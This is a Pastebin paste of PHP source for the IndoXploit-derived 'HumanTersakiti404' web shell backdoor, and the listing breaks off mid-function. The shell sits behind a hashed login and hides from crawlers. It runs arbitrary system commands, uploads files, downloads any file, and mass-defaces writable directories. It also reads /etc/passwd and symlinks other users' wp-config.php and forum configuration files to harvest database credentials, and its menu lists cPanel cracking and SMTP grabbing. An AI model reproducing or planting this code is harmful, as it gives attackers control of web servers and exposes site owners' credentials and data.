Guest User

Tapir Botax :"v

a guest
Dec 24th, 2018
311
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 164.36 KB | None | 0 0
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. @set_magic_quotes_runtime(0);
  6. @clearstatcache();
  7. @ini_set('error_log',NULL);
  8. @ini_set('log_errors',0);
  9. @ini_set('max_execution_time',0);
  10. @ini_set('output_buffering',0);
  11. @ini_set('display_errors', 0);
  12.  
  13. $auth_pass = "99e9bae675b12967251c175696f00a70"; // default: IndoXploit
  14. $color = "#00ff00";
  15. $default_action = 'FilesMan';
  16. $default_use_ajax = true;
  17. $default_charset = 'UTF-8';
  18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  19.     $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  20.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  21.         header('HTTP/1.0 404 Not Found');
  22.         exit;
  23.     }
  24. }
  25.  
  26. function login_shell() {
  27. ?>
  28. <html>
  29. <head>
  30. <link rel="icon" href="https://i.imgur.com/1ZVBkps.png type="image/x-icon"/>
  31. <title>XxX</title>
  32. <style type="text/css">
  33. html {
  34.     margin: 20px auto;
  35.     background: #000000;
  36.     color: lime;
  37.     text-align: center;
  38. }
  39. header {
  40.     color: cyan;
  41.     margin: 10px auto;
  42. }
  43. input[type=text], input[type=password],input[type=submit] {
  44.     background: transparent;
  45.     color: #ffffff;
  46.     border: 1px solid lime;
  47.     margin: 5px auto;
  48.     padding-left: 5px;
  49.     font-family: 'Ubuntu';
  50.     font-size: 13px;
  51. }
  52. </style>
  53. </head>
  54. <script language='javascript'>
  55. if (document.all||document.getElementById){
  56. var thetitle=document.title
  57. document.title=''
  58. }
  59. var data="@#$%&-+()*!?";
  60. var done=1;
  61. function statusIn(text){
  62. decrypt(text,5,50);
  63. }
  64. function statusOut(){
  65. self.status='';
  66. done=1;
  67. }
  68. function decrypt(text, max, delay){
  69. if (done){
  70. done = 0;
  71. rantit(text, max, delay, 0, max);
  72. }
  73. }
  74. function rantit(text, runs_left, delay, charvar, max){
  75. if (!done){
  76. runs_left = runs_left - 1;
  77. var status = text.substring(0,charvar);
  78. for(var current_char = charvar; current_char < text.length; current_char++){
  79. status += data.charAt(Math.round(Math.random()*data.length));
  80. }
  81. document.title = status;
  82. var rerun = "rantit('" + text + "'," + runs_left + "," + delay + "," + charvar + "," + max + ");"
  83. var new_char = charvar + 1;
  84. var next_char = "rantit('" + text + "'," + max + "," + delay + "," + new_char + "," + max + ");"
  85. if(runs_left > 0){
  86. setTimeout(rerun, delay);
  87. }
  88. else{
  89. if (charvar < text.length){
  90. setTimeout(next_char, Math.round(delay*(charvar+3)/(charvar+1)));
  91. }
  92. else
  93. {
  94. done = 1;
  95. }
  96. }
  97. }
  98. }
  99. if (document.all||document.getElementById)
  100. statusIn(thetitle)
  101. </script>
  102. <center>
  103. <div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>
  104.     <div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>
  105. <font size="4"> Login Shell </font>
  106. <form method="post">
  107. <input type="password" name="pass"><input type='submit' value='upload' name='upload'>
  108. </form>
  109. <?php
  110. exit;
  111. }
  112. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  113.     if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  114.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  115.     else
  116.         login_shell();
  117. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  118.     @ob_clean();
  119.     $file = $_GET['file'];
  120.     header('Content-Description: File Transfer');
  121.     header('Content-Type: application/octet-stream');
  122.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
  123.     header('Expires: 0');
  124.     header('Cache-Control: must-revalidate');
  125.     header('Pragma: public');
  126.     header('Content-Length: ' . filesize($file));
  127.     readfile($file);
  128.     exit;
  129. }
  130. ?>
  131. <html>
  132. <head>
  133. <link rel="icon" href="https://i.imgur.com/1ZVBkps.png" type="image/x-icon"/>  
  134. <title>HumanTersakiti404 Shell </title>
  135. <meta name='author' content='humantersakiti404'>
  136. <meta charset="UTF-8">
  137. <style type='text/css'>
  138. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  139. html {
  140.     background: black;
  141.     color: red;
  142.     font-family: 'Ubuntu';
  143.     font-size: 17px;
  144.     width: 100%;
  145. }
  146. li {
  147.     display: inline;
  148.     color: red;
  149.     margin: 5px;
  150.     padding: 5px;
  151. }
  152. table, th, td {
  153.     border-collapse:collapse;
  154.     font-family: Tahoma, Geneva, sans-serif;
  155.     background: transparent;
  156.     font-family: 'Ubuntu';
  157.     font-size: 13px;
  158. }
  159. .table_home, .th_home, .td_home {
  160.     border: 1px solid lime;
  161. }
  162. .table_home td:hover {
  163.     background: #635F5F;
  164. }
  165. th {
  166.     padding: 10px;
  167.     border-color: #BDBDBD;
  168.  }
  169. a {
  170.     color: #ffffff;
  171.     text-decoration: none;
  172. }
  173. a:hover {
  174.     color: cyan;
  175.     text-decoration: underline;
  176. }
  177. b {
  178.     color: gold;
  179. }
  180. input[type=text], input[type=password],input[type=submit] {
  181.     background: transparent;
  182.     color: #ffffff;
  183.     border: 1px solid lime;
  184.     margin: 5px auto;
  185.     padding-left: 5px;
  186.     font-family: 'Ubuntu';
  187.     font-size: 13px;
  188. }
  189. textarea {
  190.     border: 1px solid lime;
  191.     width: 100%;
  192.     height: 400px;
  193.     padding-left: 5px;
  194.     margin: 10px auto;
  195.     resize: none;
  196.     background: transparent;
  197.     color: red;
  198.     font-family: 'Ubuntu';
  199.     font-size: 13px;
  200. }
  201. select {
  202.     width: 152px;
  203.     background: #000000;
  204.     color: cyan;
  205.     border: 1px solid lime;
  206.     margin: 5px auto;
  207.     padding-left: 5px;
  208.     font-family: 'Ubuntu';
  209.     font-size: 13px;
  210. }
  211. option:hover {
  212.     background: cyan;
  213.     color: #000000;
  214. }
  215. .muter {
  216. onmousedown:stop;
  217. animation-name: rotate ;
  218. animation-duration: 5s;
  219. animation-play-state: running;
  220. animation-timing-function: linear;
  221. animation-iteration-count: infinite;
  222. opacity: 1.0;filter: alpha(opacity=50);}
  223.  
  224. .muter:hover {opacity: 1.0;filter: alpha(opacity=100);}
  225.  
  226. @keyframes rotate{
  227. 10% {transform:rotateY(36deg)}
  228. 20% {transform:rotateY(72deg)}
  229. 30% {transform:rotateY(108deg)}
  230. 40% {transform:rotateY(144deg)}
  231. 50% {transform:rotateY(180deg)}
  232. 60% {transform:rotateY(216deg)}
  233. 70% {transform:rotateY(252deg)}
  234. 80% {transform:rotateY(288deg)}
  235. 90% {transform:rotateY(324deg)}
  236. 100% {transform:rotateY(360deg)}
  237. }
  238. .phpinfo table{width:100%;padding:0 0 0 0;}
  239. .phpinfo td{background:black;color:lime;padding:6px 8px;;}
  240. .phpinfo th, th{background:#191919;border-bottom:1px solid #333333;font-weight:normal;}
  241. .phpinfo h2, .phpinfo h2 a{text-align:center;font-size:16px;padding:0;margin:30px 0 0 0;background:#222222;padding:4px 0;}
  242. .human{
  243. border:2px solid lime;
  244. }
  245. .tersakiti{
  246. border:2px solid lime;
  247. background: lime;
  248. }
  249. </style>
  250. </head>
  251. <script language='javascript'>
  252. if (document.all||document.getElementById){
  253. var thetitle=document.title
  254. document.title=''
  255. }
  256. var data="@#$%&-+()*!?";
  257. var done=1;
  258. function statusIn(text){
  259. decrypt(text,5,50);
  260. }
  261. function statusOut(){
  262. self.status='';
  263. done=1;
  264. }
  265. function decrypt(text, max, delay){
  266. if (done){
  267. done = 0;
  268. rantit(text, max, delay, 0, max);
  269. }
  270. }
  271. function rantit(text, runs_left, delay, charvar, max){
  272. if (!done){
  273. runs_left = runs_left - 1;
  274. var status = text.substring(0,charvar);
  275. for(var current_char = charvar; current_char < text.length; current_char++){
  276. status += data.charAt(Math.round(Math.random()*data.length));
  277. }
  278. document.title = status;
  279. var rerun = "rantit('" + text + "'," + runs_left + "," + delay + "," + charvar + "," + max + ");"
  280. var new_char = charvar + 1;
  281. var next_char = "rantit('" + text + "'," + max + "," + delay + "," + new_char + "," + max + ");"
  282. if(runs_left > 0){
  283. setTimeout(rerun, delay);
  284. }
  285. else{
  286. if (charvar < text.length){
  287. setTimeout(next_char, Math.round(delay*(charvar+3)/(charvar+1)));
  288. }
  289. else
  290. {
  291. done = 1;
  292. }
  293. }
  294. }
  295. }
  296. if (document.all||document.getElementById)
  297. statusIn(thetitle)
  298. </script>
  299. <?php
  300. ###############################################################################
  301. // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
  302. // Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.
  303. // Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
  304. // Tanpa kalian kita tidak akan BESAR seperti sekarang.
  305. // Greetz: All Member IndoXploit. & all my friends.
  306. ###############################################################################
  307. function w($dir,$perm) {
  308.     if(!is_writable($dir)) {
  309.         return "<font color=red>".$perm."</font>";
  310.     } else {
  311.         return "<font color=cyan>".$perm."</font>";
  312.     }
  313. }
  314. function r($dir,$perm) {
  315.     if(!is_readable($dir)) {
  316.         return "<font color=red>".$perm."</font>";
  317.     } else {
  318.         return "<font color=cyan>".$perm."</font>";
  319.     }
  320. }
  321. function exe($cmd) {
  322.     if(function_exists('system')) {        
  323.         @ob_start();       
  324.         @system($cmd);     
  325.         $buff = @ob_get_contents();        
  326.         @ob_end_clean();       
  327.         return $buff;  
  328.     } elseif(function_exists('exec')) {        
  329.         @exec($cmd,$results);      
  330.         $buff = "";        
  331.         foreach($results as $result) {         
  332.             $buff .= $result;      
  333.         } return $buff;    
  334.     } elseif(function_exists('passthru')) {        
  335.         @ob_start();       
  336.         @passthru($cmd);       
  337.         $buff = @ob_get_contents();        
  338.         @ob_end_clean();       
  339.         return $buff;  
  340.     } elseif(function_exists('shell_exec')) {      
  341.         $buff = @shell_exec($cmd);     
  342.         return $buff;  
  343.     }
  344. }
  345. function perms($file){
  346.     $perms = fileperms($file);
  347.     if (($perms & 0xC000) == 0xC000) {
  348.     // Socket
  349.     $info = 's';
  350.     } elseif (($perms & 0xA000) == 0xA000) {
  351.     // Symbolic Link
  352.     $info = 'l';
  353.     } elseif (($perms & 0x8000) == 0x8000) {
  354.     // Regular
  355.     $info = '-';
  356.     } elseif (($perms & 0x6000) == 0x6000) {
  357.     // Block special
  358.     $info = 'b';
  359.     } elseif (($perms & 0x4000) == 0x4000) {
  360.     // Directory
  361.     $info = 'd';
  362.     } elseif (($perms & 0x2000) == 0x2000) {
  363.     // Character special
  364.     $info = 'c';
  365.     } elseif (($perms & 0x1000) == 0x1000) {
  366.     // FIFO pipe
  367.     $info = 'p';
  368.     } else {
  369.     // Unknown
  370.     $info = 'u';
  371.     }
  372.         // Owner
  373.     $info .= (($perms & 0x0100) ? 'r' : '-');
  374.     $info .= (($perms & 0x0080) ? 'w' : '-');
  375.     $info .= (($perms & 0x0040) ?
  376.     (($perms & 0x0800) ? 's' : 'x' ) :
  377.     (($perms & 0x0800) ? 'S' : '-'));
  378.     // Group
  379.     $info .= (($perms & 0x0020) ? 'r' : '-');
  380.     $info .= (($perms & 0x0010) ? 'w' : '-');
  381.     $info .= (($perms & 0x0008) ?
  382.     (($perms & 0x0400) ? 's' : 'x' ) :
  383.     (($perms & 0x0400) ? 'S' : '-'));
  384.     // World
  385.     $info .= (($perms & 0x0004) ? 'r' : '-');
  386.     $info .= (($perms & 0x0002) ? 'w' : '-');
  387.     $info .= (($perms & 0x0001) ?
  388.     (($perms & 0x0200) ? 't' : 'x' ) :
  389.     (($perms & 0x0200) ? 'T' : '-'));
  390.     return $info;
  391. }
  392. function hdd($s) {
  393.     if($s >= 1073741824)
  394.     return sprintf('%1.2f',$s / 1073741824 ).' GB';
  395.     elseif($s >= 1048576)
  396.     return sprintf('%1.2f',$s / 1048576 ) .' MB';
  397.     elseif($s >= 1024)
  398.     return sprintf('%1.2f',$s / 1024 ) .' KB';
  399.     else
  400.     return $s .' B';
  401. }
  402. function ambilKata($param, $kata1, $kata2){
  403.     if(strpos($param, $kata1) === FALSE) return FALSE;
  404.     if(strpos($param, $kata2) === FALSE) return FALSE;
  405.     $start = strpos($param, $kata1) + strlen($kata1);
  406.     $end = strpos($param, $kata2, $start);
  407.     $return = substr($param, $start, $end - $start);
  408.     return $return;
  409. }
  410. function getsource($url) {
  411.     $curl = curl_init($url);
  412.             curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  413.             curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  414.             curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  415.             curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  416.     $content = curl_exec($curl);
  417.             curl_close($curl);
  418.     return $content;
  419. }
  420. function bing($dork) {
  421.     $npage = 1;
  422.     $npages = 30000;
  423.     $allLinks = array();
  424.     $lll = array();
  425.     while($npage <= $npages) {
  426.         $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
  427.         if($x) {
  428.             preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  429.             foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  430.             $npage = $npage + 10;
  431.             if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  432.         } else break;
  433.     }
  434.     $URLs = array();
  435.     foreach($allLinks as $url){
  436.         $exp = explode("/", $url);
  437.         $URLs[] = $exp[2];
  438.     }
  439.     $array = array_filter($URLs);
  440.     $array = array_unique($array);
  441.     $sss = count(array_unique($array));
  442.     foreach($array as $domain) {
  443.         echo $domain."\n";
  444.     }
  445. }
  446. function reverse($url) {
  447.     $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  448.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  449.           curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
  450.           curl_setopt($ch, CURLOPT_HEADER, 0);
  451.           curl_setopt($ch, CURLOPT_POST, 1);
  452.     $resp = curl_exec($ch);
  453.     $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  454.     $array = explode(",,", $resp);
  455.     unset($array[0]);
  456.     foreach($array as $lnk) {
  457.         $lnk = "http://$lnk";
  458.         $lnk = str_replace(",", "", $lnk);
  459.         echo $lnk."\n";
  460.         ob_flush();
  461.         flush();
  462.     }
  463.         curl_close($ch);
  464. }
  465. if(get_magic_quotes_gpc()) {
  466.     function human_ss($array) {
  467.         return is_array($array) ? array_map('human_ss', $array) : stripslashes($array);
  468.     }
  469.     $_POST = human_ss($_POST);
  470.     $_COOKIE = human_ss($_COOKIE);
  471. }
  472.  
  473. if(isset($_GET['dir'])) {
  474.     $dir = $_GET['dir'];
  475.     chdir($dir);
  476. } else {
  477.     $dir = getcwd();
  478. }
  479. $kernel = php_uname();
  480. $admin_id=$_SERVER['SERVER_ADMIN'];
  481. $software = getenv("SERVER_SOFTWARE");
  482. $d0mains = @file("/etc/named.conf");
  483.             $users=@file('/etc/passwd');
  484.         if($d0mains)
  485.         {
  486.             $count;  
  487.             foreach($d0mains as $d0main)
  488.             {
  489.                 if(@ereg("zone",$d0main))
  490.                 {
  491.                     preg_match_all('#zone "(.*)"#', $d0main, $domains);
  492.                     flush();
  493.                     if(strlen(trim($domains[1][0])) > 2)
  494.                     {
  495.                         flush();
  496.                         $count++;
  497.                     }
  498.                 }
  499.             }
  500.         }
  501. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  502. $dir = str_replace("\\","/",$dir);
  503. $scdir = explode("/", $dir);
  504. $freespace = hdd(disk_free_space("/"));
  505. $total = hdd(disk_total_space("/"));
  506. $used = $total - $freespace;
  507. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=cyan>OFF</font>";
  508. $ds = @ini_get("disable_functions");
  509. $mysql = (function_exists('mysql_connect')) ? "<font color=cyan>ON</font>" : "<font color=red>OFF</font>";
  510. $curl = (function_exists('curl_version')) ? "<font color=cyan>ON</font>" : "<font color=red>OFF</font>";
  511. $wget = (exe('wget --help')) ? "<font color=cyan>ON</font>" : "<font color=red>OFF</font>";
  512. $perl = (exe('perl --help')) ? "<font color=cyan>ON</font>" : "<font color=red>OFF</font>";
  513. $python = (exe('python --help')) ? "<font color=cyan>ON</font>" : "<font color=red>OFF</font>";
  514. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=cyan>NONE</font>";
  515. if(!function_exists('posix_getegid')) {
  516.     $user = @get_current_user();
  517.     $uid = @getmyuid();
  518.     $gid = @getmygid();
  519.     $group = "?";
  520. } else {
  521.     $uid = @posix_getpwuid(posix_geteuid());
  522.     $gid = @posix_getgrgid(posix_getegid());
  523.     $user = $uid['name'];
  524.     $uid = $uid['uid'];
  525.     $group = $gid['name'];
  526.     $gid = $gid['gid'];
  527. }
  528. echo "<img src='https://i.imgur.com/1ZVBkps.png width='220px' height='220px' class='muter' style='float: left;'>";
  529. echo "System: <font color=white>".$kernel."</font><br>";
  530. echo "User: <font color=white>".$user."</font> (".$uid.") Group: <font color=white>".$group."</font> (".$gid.")<br>";
  531. echo "Server IP: <font color=white>".$ip."</font> | Your IP: <font color=white>".$_SERVER['REMOTE_ADDR']."</font><br>";
  532. echo "PHP Version : <font color=white>".phpversion()."</font> <font color='white'> on</font> <font color=white>".php_sapi_name()."</font> <font class='asu'>[<a href='?dir=$dir&do=phinfo'>PHP Info</a>]</font><br>";
  533. echo "Admin : <font color=white>".$admin_id."</font> | Websites: <font color=white>$count</font>  Domains<br>";
  534. echo "HDD: <font color=white>$used</font> / <font color=white>$total</font> ( Free: <font color=white>$freespace</font> )<br>";
  535. echo "Safe Mode: <fomt color=white>$sm</font><br>";
  536. echo "MySQL: <font color=white>$mysql</font> | Perl: <font color=white>$perl</font> | Python: <font color=white>$python</font> | WGET: <font color=white>$wget</font> | CURL: <font color=white>$curl</font><br> <br>";
  537. echo "&nbsp;Current DIR: ";
  538. foreach($scdir as $c_dir => $cdir) {   
  539.     echo "<a href='?dir=";
  540.     for($i = 0; $i <= $c_dir; $i++) {
  541.         echo $scdir[$i];
  542.         if($i != $c_dir) {
  543.         echo "/";
  544.         }
  545.     }
  546.     echo "'>$cdir</a>/";
  547. }
  548. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
  549. echo "<br><br><br>";
  550. echo "<center>";
  551. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>";
  552. echo "<font color=red size=5>HumanTersakiti404 Shell Backdoor</font><br>";
  553. echo "</div>";
  554. echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  555. echo "<ul>";
  556. echo "<li><font color='lime'>[</font> <a href='?'> <font color='red'>Home</font> </a> <font color='lime'>]</font></li>";
  557. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=upload'> <font color='white'>Upload</font> </a> <font color='lime'>]</font></li>";
  558. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=cmd'> <font color='red'>Command</font> </a> <font color='lime'>]</font></li>";
  559. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=mass_deface'> <font color='white'>Mass Deface</font> </a> <font color='lime'>]</font></li>";
  560. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=config'> <font color='red'>Config</font> </a> <font color='lime'>]</font></li>";
  561. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=jumping'> <font color='white'>Jumping</font> </a> <font color='lime'>]</font></li>";
  562. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=cpanel'> <font color='red'>CPanel Crack</font> </a> <font color='lime'>]</font></li>";
  563. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=smtp'> <font color='white'>SMTP Grabber</font> </a> <font color='lime'>]</font></li><br>";
  564. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=symlink'> <font color='red'>Symlink</font> </a> <font color='lime'>]</font></li>";
  565. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=zoneh'> <font color='white'>Zone-H</font> </a> <font color='lime'>]</font></li>";
  566. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=cgi'> <font color='red'>CGI Telnet</font> </a> <font color='lime'>]</font></li>";
  567. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=adminer'> <font color='white'>Adminer</font> </a> <font color='lime'>]</font></li>";
  568. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=csrf'> <font color='red'>CSRF</font> </a> <font color='lime'>]</font></li>";
  569. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=videosex'> <font color='white'>Streaming Bokep</font> </a> <font color='lime'>]</font></li>";
  570. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=auto_edit_user'> <font color='red'>Auto Edit User</font> </a> <font color='lime'>]</font></li>";
  571. echo "<li><font color='lime'>[</font> <a style='color: red;' href='?logout=true'> <font color='white'>Logout</font> </a> <font color='lime'>]</font></li>";
  572. echo "</ul>";
  573. echo "</center>";
  574. if($_GET['logout'] == true) {
  575.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  576.     echo "<script>window.location='?';</script>";
  577. } elseif($_GET['do'] == 'upload') {
  578.     echo "<center>";
  579.     if($_POST['upload']) {
  580.         if($_POST['tipe_upload'] == 'biasa') {
  581.             if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  582.                 $act = "<font color=cyan>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  583.             } else {
  584.                 $act = "<font color=red>failed to upload file</font>";
  585.             }
  586.         } else {
  587.             $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  588.             $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  589.             if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  590.                 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  591.                     $act = "<font color=cyan>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  592.                 } else {
  593.                     $act = "<font color=red>failed to upload file</font>";
  594.                 }
  595.             } else {
  596.                 $act = "<font color=red>failed to upload file</font>";
  597.             }
  598.         }
  599.     }
  600.     echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'> [+] Upload Files [+]</div>";
  601.     echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  602.     echo "<form method='post' enctype='multipart/form-data'>
  603.     <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  604.     <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  605.     <input type='file' name='ix_file'>
  606.     <input type='submit' value='upload' name='upload'>
  607.     </form>";
  608.     echo $act;
  609.     echo "</div>";
  610. } elseif($_GET['do'] == 'cmd') {
  611.     echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] Command [+]</div>";
  612.     echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  613.     echo "<form method='post'>
  614.     <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
  615.     <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  616.     </form>";
  617.     echo "</div>";
  618.     if($_POST['do_cmd']) {
  619.         echo "<pre>".exe($_POST['cmd'])."</pre>";
  620.     }
  621. } elseif($_GET['do'] == 'mass_deface') {
  622.     function sabun_massal($dir,$namafile,$isi_script) {
  623.         if(is_writable($dir)) {
  624.             $dira = scandir($dir);
  625.             foreach($dira as $dirb) {
  626.                 $dirc = "$dir/$dirb";
  627.                 $lokasi = $dirc.'/'.$namafile;
  628.                 if($dirb === '.') {
  629.                     file_put_contents($lokasi, $isi_script);
  630.                 } elseif($dirb === '..') {
  631.                     file_put_contents($lokasi, $isi_script);
  632.                 } else {
  633.                     if(is_dir($dirc)) {
  634.                         if(is_writable($dirc)) {
  635.                             echo "[<font color=cyan>DONE</font>] $lokasi<br>";
  636.                             file_put_contents($lokasi, $isi_script);
  637.                             $human = sabun_massal($dirc,$namafile,$isi_script);
  638.                         }
  639.                     }
  640.                 }
  641.             }
  642.         }
  643.     }
  644.     function sabun_biasa($dir,$namafile,$isi_script) {
  645.         if(is_writable($dir)) {
  646.             $dira = scandir($dir);
  647.             foreach($dira as $dirb) {
  648.                 $dirc = "$dir/$dirb";
  649.                 $lokasi = $dirc.'/'.$namafile;
  650.                 if($dirb === '.') {
  651.                     file_put_contents($lokasi, $isi_script);
  652.                 } elseif($dirb === '..') {
  653.                     file_put_contents($lokasi, $isi_script);
  654.                 } else {
  655.                     if(is_dir($dirc)) {
  656.                         if(is_writable($dirc)) {
  657.                             echo "[<font color=cyan>DONE</font>] $dirb/$namafile<br>";
  658.                             file_put_contents($lokasi, $isi_script);
  659.                         }
  660.                     }
  661.                 }
  662.             }
  663.         }
  664.     }
  665.     if($_POST['start']) {
  666.         if($_POST['tipe_sabun'] == 'mahal') {
  667.             echo "<div style='margin: 5px auto; padding: 5px'>";
  668.             sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  669.             echo "</div>";
  670.         } elseif($_POST['tipe_sabun'] == 'murah') {
  671.             echo "<div style='margin: 5px auto; padding: 5px'>";
  672.             sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  673.             echo "</div>";
  674.         }
  675.     } else {
  676.     echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] Mass Deface [+]</div>";
  677.     echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  678.     echo "<center>";
  679.     echo "<form method='post'>
  680.     <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  681.     <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  682.     <font style='text-decoration: underline;'>Folder:</font><br>
  683.     <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  684.     <font style='text-decoration: underline;'>Filename:</font><br>
  685.     <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  686.     <font style='text-decoration: underline;'>Index File:</font><br>
  687.     <textarea name='script' style='width: 450px; height: 200px;'>Hacked by HumanTersakiti404</textarea><br>
  688.     <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  689.     </form></center>";
  690.     }
  691. }
  692. elseif($_GET['do'] == 'symconfig') {
  693. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
  694. echo '<script>alert("Skid this won\'t work on Windows")</script>';
  695. exit;
  696. }
  697. else
  698. {
  699. if($_POST["m"] && !$_POST["passwd"]==""){
  700. @mkdir("human_symconf", 0777);
  701. @chdir("human_symconf");
  702. @symlink("/","root");
  703. $htaccess="Options Indexes FollowSymLinks
  704. DirectoryIndex z.htm
  705. AddType text/plain .php
  706. AddHandler text/plain .php
  707. Satisfy Any";
  708. @file_put_contents(".htaccess",$htaccess);
  709. $etc_passwd=$_POST["passwd"];
  710. $etc_passwd=explode("\n",$etc_passwd);
  711. foreach($etc_passwd as $passwd){
  712. $pawd=explode(":",$passwd);
  713. $user =$pawd[0];
  714.  
  715. @symlink('/','human_symconf/root');
  716. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  717. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  718. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  719. @symlink('/home/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  720. @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  721. @symlink('/home/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  722. @symlink('/home/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  723. @symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  724. @symlink('/home/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  725. @symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  726. @symlink('/home/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  727. @symlink('/home/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  728. @symlink('/home/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  729. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  730. @symlink('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  731. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  732. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  733. @symlink('/home/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  734. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
